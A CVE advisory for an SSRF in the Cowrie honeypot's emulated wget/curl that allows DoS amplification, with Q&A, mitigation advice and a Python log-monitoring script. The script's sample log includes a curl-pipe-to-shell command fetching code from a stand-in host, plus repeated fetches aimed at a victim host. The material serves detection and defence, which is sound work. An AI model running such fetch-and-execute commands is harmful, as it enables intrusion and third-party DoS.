CVE-2025-34469
SSRF in Cowrie wget/curl Enables DoS Amplification Abuse
Publication date: 2025-12-31
Last updated on: 2025-12-31
Assigner: VulnCheck
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cowrie | cowrie | * |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a server-side request forgery (SSRF) in Cowrie versions prior to 2.9.0. It occurs in the emulated shell implementation of wget and curl commands, which perform real outbound HTTP requests to attacker-supplied destinations without rate limiting. This allows unauthenticated remote attackers to repeatedly invoke these commands to generate unlimited HTTP traffic toward arbitrary third-party targets, abusing the Cowrie honeypot as a denial-of-service amplification node and hiding the attacker's true source IP behind the honeypot's IP.
How can this vulnerability impact me?
The vulnerability can be exploited by attackers to generate unbounded HTTP traffic toward arbitrary third-party targets, effectively using the Cowrie honeypot as a denial-of-service amplification node. This can lead to denial-of-service attacks on third parties and can mask the attacker's true source address by hiding it behind the honeypot's IP address.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade Cowrie to version 2.9.0 or later, where the SSRF issue in the emulated wget and curl commands is fixed. Additionally, consider implementing outbound request rate limiting and monitoring outbound HTTP traffic from the honeypot to detect and prevent abuse.
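The monitoring step suggested above, as an added example (not code from Cowrie or from this page): a sliding-window check over Cowrie's JSON log that flags source IPs issuing many emulated wget/curl fetches. The log lines are constructed, the 60-second window and threshold of 5 are illustrative assumptions, and the helper names `fetch_targets` and `flag_sources` are hypothetical.

```python
import json, re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import urlsplit

# Constructed sample in Cowrie's JSON-lines log format (not real traffic).
_EVENTS = [("198.51.100.7", s, "wget -q http://victim.example/a") for s in range(0, 12, 2)]
_EVENTS += [("198.51.100.7", 13, "cd /tmp; curl -s -o /dev/null victim.example/b"),
            ("203.0.113.9", 5, "curl http://updates.example/x.sh | sh"), ("203.0.113.9", 40, "uname -a")]
SAMPLE_LOG = "\n".join(json.dumps({
    "eventid": "cowrie.command.input", "src_ip": ip, "input": cmd,
    "timestamp": f"2025-12-31T10:00:{sec:02d}.000000Z"}) for ip, sec, cmd in _EVENTS)

def fetch_targets(command_line):
    """Best-effort list of destination hosts for each wget/curl call in one input line."""
    hosts = []
    for part in re.split(r"[;&|]+", command_line):    # shell command separators
        argv = part.split()
        if not argv or argv[0].rsplit("/", 1)[-1] not in ("wget", "curl"):
            continue
        for arg in argv[1:]:
            arg = arg.strip("'\"")
            if arg.startswith("-"):                   # option flag, not a URL
                continue
            # Scheme-less URLs are accepted; values like /dev/null yield no hostname.
            host = urlsplit(arg if "://" in arg else "http://" + arg).hostname
            if host:
                hosts.append(host)
    return hosts

def flag_sources(log_text, window_s=60, threshold=5):
    """Return {src_ip: [target hosts]} for sources above `threshold` fetches per window."""
    recent, targets, flagged = defaultdict(deque), defaultdict(set), set()
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:                  # skip truncated or non-JSON lines
            continue
        is_cmd = ev.get("eventid") == "cowrie.command.input"
        hosts = fetch_targets(ev.get("input", "")) if is_cmd else []
        if not hosts:
            continue
        ts = datetime.fromisoformat(ev["timestamp"].replace("Z", "+00:00")).timestamp()
        q = recent[ev["src_ip"]]
        q.extend([ts] * len(hosts))
        while ts - q[0] > window_s:                   # slide the window forward
            q.popleft()
        targets[ev["src_ip"]].update(hosts)
        if len(q) > threshold:
            flagged.add(ev["src_ip"])
    return {ip: sorted(targets[ip]) for ip in flagged}
```

Host extraction is heuristic: an option value that looks like a hostname (an output filename, for instance) can be counted as a target, so treat the host list as a triage hint and the per-source rate as the signal.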